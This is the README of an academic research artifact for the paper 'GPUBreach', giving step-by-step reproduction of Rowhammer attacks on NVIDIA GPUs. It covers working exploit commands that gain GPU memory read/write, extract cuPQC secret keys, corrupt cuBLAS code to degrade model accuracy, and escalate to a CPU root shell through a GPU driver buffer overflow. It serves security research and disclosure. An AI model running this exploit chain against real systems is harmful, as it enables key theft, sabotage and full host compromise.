This is the code artifact for the paper "GPUBreach: Privilege Escalation Attacks on GPUs using Rowhammer", to be presented at IEEE Security & Privacy (Oakland) 2026
Authors: Chris S. Lin, Yuqin Yan, Joyce Qu, Joseph Zhu, Guozhen Ding, David Lie, Gururaj Saileshwar. University of Toronto
In this artifact, we aim to reproduce the following:
-
PT Massaging Primitives (Figures 5, 7, 8, and 10)
-
GPU Privilege Escalation - Arbitrary Read & Write Capabilities with GPUBreach (Table 2, Sections 6.1 - 6.3, Table 3)
-
CPU Privilege Escalation - End-to-End GPU-CPU Exploit (Section 6.4)
All the results are automatically generated except the CPU Privilege Exploit, which has an interactive component (more details below).
Please see src/README.md for additional usage/implementation details.
Run-time Environment: We suggest using a Linux distribution compatible with g++-11 or newer.
-
Software Dependencies:
- CMake 3.22+
- g++ with C++17 Support
- NVIDIA CUDA Driver: 580.95.05
- NVIDIA CUDA Toolkit
- NVIDIA System Management Interface
nvidia-smi - Python 3.10+
-
Hardware Dependencies:
- NVIDIA GPU sm_80+
Our reference system:
- OS: Ubuntu 22.04.5 LTS
- CPU: AMD Ryzen Threadripper PRO 5945WX 12-Cores
- GPU: NVIDIA RTX A6000 (48 GB GDDR6, sm_80)
- Driver: NVIDIA Driver 580.95.05 (includes nvidia-smi)
- CUDA Toolkit: 12.8
- Compiler: g++ 10.5.0
Ensure you have already cloned the repository:
git clone https://github.com/sith-lab/gpubreach.git
cd gpubreachOur profiling results require the set of tools developed in the gpu-tlb repository. This is included in our artifact. Patching the NVIDIA driver with the modifications from gpu-tlb works as follows: (this step can be skipped for AE, as we have the patched driver set up on our local GPU)
cd gpubreach
wget https://us.download.nvidia.com/XFree86/Linux-x86_64/580.95.05/NVIDIA-Linux-x86_64-580.95.05.run
chmod +x NVIDIA-Linux-x86_64-580.95.05.run
./NVIDIA-Linux-x86_64-580.95.05.run -x
cd NVIDIA-Linux-x86_64-580.95.05/
# This patch works for our version as well.
patch -p1 < ../gpu-tlb/dumper/patch/driver-570.133.07.patchNow use the installer to install the driver. Please select MIT/GPL installation and choose just the default options.
sudo ./nvidia-installerAfterward, run these to make the relevant dumpers.
cd ../ # goes back to gpubreach
bash run_make_dumpers.shFor the Rowhammer attack, a prerequisite is having ECC disabled. We observe that this is the default setting on A6000 GPUs on many cloud providers. But if it is enabled, use the following commands to disable it (we have already set this up on our local GPU, so you can skip this step for AE):
# No need to do this for AE.
sudo nvidia-smi -e 0
rmmod nvidia_drm
rmmod nvidia_modeset
sudo rebootOur profiling is easier with the persistence mode enabled and with fixed GPU and memory clock rates, although these are not prerequisites. The following script performs the above actions:
# Example usage:
# bash ./gpuhammer/util/init_cuda.sh <MAX_GPU_CLOCK> <MAX_MEMORY_CLOCK>
cd gpubreach
bash gpuhammer/util/init_cuda.sh 1800 7600MAX_GPU_CLOCK and MAX_MEMORY_CLOCK can be found with deviceQuery from CUDA samples. We provide this for A6000 in 'gpuhammer/src/deviceQuery.txt'.
These changes can be undone with bash gpuhammer/util/reset_cuda.sh.
Our artifact requires the ImageNet 2012 Validation Dataset, which is available from the official ImageNet website. Please note that downloading requires a (free) ImageNet account — please register at https://www.image-net.org/download-images.php before proceeding.
We require the "Validation images (all tasks)" under Images when inside the ImageNet 2012 DataSet webpage. Please obtain the download link and download it to the repository root as follows:
# Make sure you are downloading the file into the repository root directory
cd gpubreach
wget <download link>The downloaded file's name should be ILSVRC2012_img_val.tar.
Run the following commands to set up environment variables, install dependencies, and build GPUBreach.
Important: You should either run source ./init_env.sh for every terminal or add the exports to .bashrc.
cd gpubreach
source ./init_env.shAfterwards, run:
bash ./run_auto_artifacts.sh./run_auto_artifacts.sh runs the parts of the artifact that can be done non-interactively. This includes the PT Region Massaging Experiments (Fig 5, 7, 8, 10) and the demonstration of GPU-side privilege escalation in Section 6.1 - 6.3. We use one of the bit flips already discovered in Table-2 (A1) for all these attacks for ease of reproducibility.
For PT Massaging Primitives, ./run_auto_artifacts.sh will run the following steps to generate the results:
bash run_fig5.sh #(~ 30 minutes) ; Page types used with different allocation sizes.
bash run_fig7.sh # (< 1 minutes) ; UVM eviction side-channel to identify when memory is full
bash run_fig8.sh #(< 1 minutes) ; UVM eviction side-channel when PT region is allocated with the memory
bash run_fig10.sh #(< 1 minutes) ; UVM eviction side-channel using 4KB Pagesand the results will be stored in results/.
NOTE: We additionally provide sample outputs of all experiments in the folder
./results/sample.
Reproduced with bash run_fig5.sh. It iteratively tries different allocation sizes and extracts the data page sizes used with gpu-tlb dumper. The result is reproduced successfully if the output PDF uses 4KB pages for allocations greater than 2MB, using ./results/sample/fig5.pdf as a reference.
Reproduced with bash run_fig7.sh. The result is reproduced successfully if the output PDF shows timing spikes of ~0.2ms after ~24000 allocations, using ./results/sample/fig7.pdf as a reference. The timing may look slightly different from our paper due to a more recent driver used for our artifact.
Reproduced with bash run_fig8.sh. The result is reproduced successfully if the output PDF shows a timing spike for leaving 2MB freed but none for leaving 4MB free, using ./results/sample/fig8.pdf as reference.
Reproduced with bash run_fig10.sh. The result is reproduced successfully if the output PDF shows consistent timing spikes every 508 allocations, using ./results/sample/fig10.pdf as a reference.
./run_auto_artifacts.sh also runs the parts of the artifact to demonstrate the GPU-side privilege escalation (Exploits in Section 6.1-6.3). It runs the scripts shown below, reproducing the known vulnerable bit flips (Table-2) and using one of the bit flips (A1 in Table-2) for subsequent experiments.
bash run_t2.sh # (< 10 minutes) ; It hammers the known vulnerable bitflip positions that we used in the paper, to reproduce Table 2.
bash run_gpubreach_demo.sh #(< 5 minutes) ; It runs the exploit and reads/modifies another process's data from the GPU memory.
## The privilege escalation takes ~17 seconds, the rest of the time is spent on memory dumping for the demonstration.
bash run_cupqc_exploit.sh #(< 1 hour) ; It runs the exploit, then locates the memory used by victim cuPQC kernels and extracts the secret keys.
bash run_ml_exploit.sh #(< 10 minutes) ; It runs the exploit, then modifies a cuBLAS branch through the known vulnerable cuBLAS SASS template, which degrades the model accuracy universally.Note 1: Other than
run_t2.sh, the other scripts spawn detached background processes, which need to be killed manually if you decide to terminate the exploit scripts early.
Note 2: There is a very low probability of the exploit chains crashing the attacker program, in which case you can simply re-run the exploit bash script when everything is killed or if necessary, reboot or power cycle in Debugging Tips.
With bash run_t2.sh, we ran GPUHammer to reproduce the bit-flips in Table 2. All of these are at appropriate locations suitable for our GPU page table tampering.
Table 2 is generated successfully if the results in results/t2/t2.txt overlap with Table 2 in the paper. Note that sometimes not all flips may be reproduced due to the temporal randomness of Rowhammer.
With bash run_gpubreach_demo.sh, the GPUBreach exploit chain runs automatically on our GPU and achieves GPU privilege escalation, gaining arbitrary read/write privilege on GPU memory. These privileges are demonstrated by showing that we can read and modify another program's data in the GPU memory. Once this is achieved, exploits in Sections 6.2 and 6.3 can be executed.
In this demonstration, a victim program from ./data_scripts/gpubreach_demo/sample_app.cu is run and its memory is initialized to 0xdeadbeefabcdabcd.
GPU privilege escalation is successful if the results in results/gpubreach_demo/memdump.txt show that the memory dumped by GPUBreach contains 0xdeadbeefabcdabcd, and the results/gpubreach_demo/app.out shows "Modified. Exiting" which indicates this memory was also modified by GPUBreach.
With bash run_cupqc_exploit.sh, after GPU privilege-escalation, the attacker attempts to locate memory used by the victim by exploiting the cudaFree/Alloc() memory-zeroing behaviour. Then, it will rapidly dump out the candidate victim pages found, looking for secret keys.
In this demonstration, a victim program from ./data_scripts/cupqc_exploit/keyexchange_victim.cu is run repeatedly every 2 seconds. Each time, the attacker probes each candidate page and dumps the content.
The attack is successful if the results in results/cupqc_exploit/cupqc.txt show that one of the candidate pages was dumped successfully with the expected secret key value.
With bash run_ml_exploit.sh, after GPU privilege-escalation, the attacker looks for a known vulnerable cuBLAS template in GPU memory and corrupts the vulnerable branch.
In this demonstration, a victim program from ./data_scripts/ml_exploit/run_imagenet_models.py is run. Once the pytorch cuBLAS code is loaded into the GPU code segment, the attacker will corrupt the target branch during its idle time, resulting in universally degraded accuracy for all models.
The attack is successful if the results in results/ml_exploit/t3.txt show similar degradation and performance impact as Table 3 in the paper.
This exploit starts from the user space on the GPU and achieves an arbitrary write primitive to the CPU's kernel memory, assuming IOMMU protection is enabled. The attacker tampers with the GPU driver metadata in the CPU memory via DMA from the GPU (region permitted for access by the IOMMU). This tampered data, when consumed by the GPU driver, causes a buffer overflow that overwrites an adjacent buffer in the GPU driver containing kernel memory pointers. This results in an arbitrary write primitive inside the entire kernel memory: the attacker uses the arbitrary write primitive in the kernel space to overwrite the euid of the current process to 0, and thus spawns a root shell.
Our evaluation has the following CPU-side configuration:
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Address sizes: 48 bits physical, 48 bits virtual
Byte Order: Little Endian
CPU(s): 24
On-line CPU(s) list: 0-23
Vendor ID: AuthenticAMD
Model name: AMD Ryzen Threadripper PRO 5945WX 12-Cores
CPU family: 25
Model: 8
Thread(s) per core: 2
Core(s) per socket: 12
Socket(s): 1
Stepping: 2
NUMA:
NUMA node(s): 1
NUMA node0 CPU(s): 0-23
Dump the Cred Structure Address
This step gets the address of the cred structure. This is based on the exploit's assumption that a process's cred data structure can be leaked via other side-channels.
$ cd gpubreach/cred_mod/
$ make
$ sudo insmod get_cred_addr.koBuild CPU-side exploit
Next, we build the CPU-side exploit components. We also generate a file d_pattern.bin containing a 1GB data pattern of repeating "0x64", that will be filled in the GPU memory. This pattern is used to identify the PA for a VA we control, and the associated PTE, which we will eventually redirect to the IOVA region.
$ cd gpubreach/d2h-tools/
$ ./create_d_pattern.py --size 1GB --output d_pattern.bin
$ cd cpu-exploit/
$ make -jThis step will perform the GPU-side privilege escalation, find the candidate PTE of a VA we control to redirect the translation to point to an IOVA.
First, we execute the GPUBreach program designed for this exploit.
$ cd gpubreach
$ python3 gpubreach.py app_cpu_exploit --n_step1 24109 -t 0.2 -s 15 -c "$BREACH_ROOT/flip_config_sample/FLIP_LEFT_TMPL.ini"Note: '-c' is the bit-flip configuration file for A1. See
src/README.mdfor more details.
When corruption is successful, the program will pause, and you will see the following text:
(Stable Primitive Ready) Start cpu-exploit now. It should load its page with 0x6464646464646464.
Press Enter Key to start finding and modifying that page's PTE.
Next, we locate the PTE that we need to tamper with to access the IOVA.
On a second terminal, please execute the following, which first loads the attacker memory with 0x6464646464646464:
$ cd gpubreach/d2h-tools
$ ./cpu-exploit/cpu-exploit ./d_pattern.binOnce this creates a new terminal, it means the data has been loaded. Now go back to GPUBreach’s terminal (first terminal) and Press Enter Key. On success, GPUBreach will print the text below:
Found its PTE, modified your pointer's PTE to point to: 0x060000000fff0005
Press Enter Key if you want to write 0x060000000ffe0005 instead.
Note that the GPU's IOVA value is stable across runs and machines, always 0xffe41000 or 0xfff41000. Unfortunately, we do not know which one is used on each bootup, so the attack may fail. Regardless, you may choose whether to write 0x060000000fff0005 or 0x060000000ffe0005 by following the instructions from the GPUBreach output.
Now you are ready to move on to Step 2.
In the command prompt that was opened using ./cpu-exploit (second terminal above), run the following application commands step by step. Note that > means that these commands are run in the exploit's command prompt, not the regular shell.
> poc-init # Initializes the base of the buffer under operation by scanning the memory.
> poc-cw-entry0-checksum # Scans the slots, discovers the current sequence numbers, and infers the next couple of sequence numbers that will be used. It then generates a payload indicating that there are 16 more messages followed by it with the correct checksum and writes them to the next entries, which the POC predicts the GPU Driver will consume.
> poc-privesc # Construct the 17-entry message that will overflow the buffer, and then overwrite the GSP's message queue in the driver.
> poc-trigger 1 # Start a thread that continuously sends GPU queries.You can now return to the exploit's command prompt and check your privileges:
> whoamiExpected output:
User identity check:
Real UID: 1000 (this is your original UID, which might differ from this)
Effective UID: 0
The effective UID of 0 indicates successful privilege escalation to root.
If the Effective UID is not 0, the exploit has failed. You can try to execute poc-trigger 5 again. If still unsuccessful, you may need to reboot the machine using out-of-band methods and restart the exploit.
If the previous step has succeeded, use the fork command to spawn a root shell:
> forkExpected output:
In child process (PID: XXXX)
Effective UID: 0
# whoami
root
# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
You now have a root shell while starting as a regular user.
To reproduce only the driver-side vulnerability and CPU privilege escalation, we may attempt to perform the exploit by simulating the GPU-side privilege escalation without GPUBreach, but with the gpu-tlb dumper instead.
This is because sometimes the bit flips can disappear for a while, especially sometimes after we power cycle the machine (i.e. Debugging Tips).
In one terminal, we execute:
$ cd gpubreach/d2h-tools
$ ./cpu-exploit/cpu-exploit ./d_pattern.bin # Run this command as-is as a regular user with GPU access (non-root).Instead of using GPUBreach, we will simulate the arbitrary RW with the simulate_rowhammer.sh script. Modify the IOVA_BASE in simulate_rowhammer.sh to 0xfff00000 or 0xffe00000.
In another terminal, we execute:
$ cd d2h-tools/gpu_mem_dumper/scripts/
$ sudo bash ./simulate_rowhammer.shNow you can go back to step 2 above.
-
After an out-of-band restart, due to voltage changes, we notice bit-flips will disappear for a while. Whenever a restart happens, run the following to check for a bit-flip:
cd gpubreach source ./init_env.sh # Not needed if already run before bash run_regenerate_a1.sh
It will iteratively hammer and check whether the bit-flip re-appeared. Unfortunately, when exactly it will reappear is a bit variable (sometimes it takes a few minutes). You may choose to wait a few hours before restarting the process. For the CPU-GPU exploit, you may also go to the Alternative Step 1, given that we already demonstrated arbitrary RW.